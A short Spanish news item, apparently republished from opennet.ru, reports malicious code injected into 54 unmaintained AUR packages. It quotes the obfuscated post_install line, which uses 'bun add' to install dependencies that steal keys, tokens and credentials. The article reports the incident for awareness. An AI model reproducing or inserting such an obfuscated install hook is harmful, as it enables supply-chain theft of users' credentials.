Se ha producido la inyección de código malicioso en 54 paquetes más en AUR

A pesar de las medidas tomadas por los desarrolladores de Arch Linux, la actividad de inyección de código malicioso en los repositorios de AUR (Arch User Repository) no ha cesado. Hace unas horas, se inyectó código malicioso en 54 paquetes más, que no contaban con mantenedores (historial de revertidos de modificaciones maliciosas). A diferencia de los ataques de anteayer, en esta ocasión se ha utilizado la plataforma bun en lugar del gestor de paquetes npm para instalar dependencias maliciosas. Para eludir los filtros implementados, se inserta una línea ofuscada en la función post_install, en la que se llama al comando “bun add” para instalar paquetes con código malicioso que escanean y envían información a una ubicación externa. servidor claves, tokens y credenciales.

post_install() {
$’\x63′»d» «/»‘t'»m»‘p’ && «b»‘u»n’ ‘a'»d»‘d’ $’\141\x6e»s'»i»»-«$’\143»o»l»o»r’$’\x73′ ‘n'»e»‘x'»»f»‘i»l»e»-»j»s’
}

Fuente: opennet.ru

Compra un hosting fiable para sitios web con protección contra DDoS, servidores VPS VDS 🔥 Compra un hosting fiable para sitios web con protección contra DDoS, servidores VPS VDS | ProHoster